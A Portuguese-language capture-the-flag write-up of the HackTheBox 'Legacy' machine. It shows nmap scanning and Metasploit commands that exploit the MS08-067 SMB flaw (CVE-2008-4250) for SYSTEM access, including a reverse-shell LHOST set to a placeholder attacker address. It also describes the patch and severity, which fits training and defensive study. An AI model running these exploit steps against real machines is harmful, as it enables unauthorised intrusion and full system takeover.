Exploração prática do Windows SMB: Legacy CTF
Tabela de Conteúdos
ToggleLegacy
Legacy é uma máquina relativamente direta ao ponto, direcionada para iniciantes, que demonstra os riscos de segurança em potencial do SMB no Windows.
HackTheBox
O HackTheBox fornece aos indivíduos, empresas e universidades as ferramentas necessárias para melhorar continuamente as suas capacidades de cibersegurança - tudo num só lugar.
BEHIND SECURITY
Behind Security é uma plataforma online dedicada a fornecer artigos informativos sobre cibersegurança, privacidade e programação.
Enumeração de Serviços
O Behind Security usou a ferramenta nmap no endereço IP 10.10.10.4 e conseguiu identificar que as portas TCP 135, 139 e 445 estão abertas.
Comando: nmap -sV -sC -T4 10.10.10.4 -v -Pn
É importante notar a presença da opção -Pn, indicando que o nmap não verificará se o host está ativo. Isso é particularmente útil neste caso, já que a máquina de destino não está respondendo a solicitações ICMP.
Enumeração do SMB
Behind Security usou a ferramenta Nmap, especificando scripts para detecção de vulnerabilidades da NSE (Nmap Scripting Engine). O comando utilizado foi: nmap -sV –script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, e os resultados são apresentados abaixo.
Acesso Inicial – Execução Remota de Código (CVE-2008-4250)
Explicação da Vulnerabilidade: Essa vulnerabilidade pode permitir a execução remota de código se um sistema afetado receber uma solicitação RPC especialmente criada. Em sistemas Microsoft Windows 2000, Windows XP e Windows Server 2003, um atacante poderia explorar essa vulnerabilidade sem autenticação para executar código arbitrário. É possível que essa vulnerabilidade possa ser utilizada para criar um exploit que se propaga automaticamente (wormable exploit). A vulnerabilidade foi identificada como CVE-2008-4250 e mais informações podem ser encontradas aqui.
Correção da Vulnerabilidade: A Microsoft lançou uma atualização para corrigir esse problema conhecido. Mais informações podem ser vistas aqui.
Gravidade: Crítico
Passos para Reproduzir o Ataque: Existe um módulo do Metasploit publicamente disponível para explorar essa vulnerabilidade.
msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run
Captura de tela:
Pós-Exploração
O servidor SMB está sendo executado como SYSTEM e uma exploração bem-sucedida resultaria em um atacante remoto obtendo privilégios administrativos na máquina. Isso significa que o atacante teria controle completo sobre o sistema comprometido, podendo executar comandos com os mais altos níveis de permissões e acesso a todos os recursos do sistema.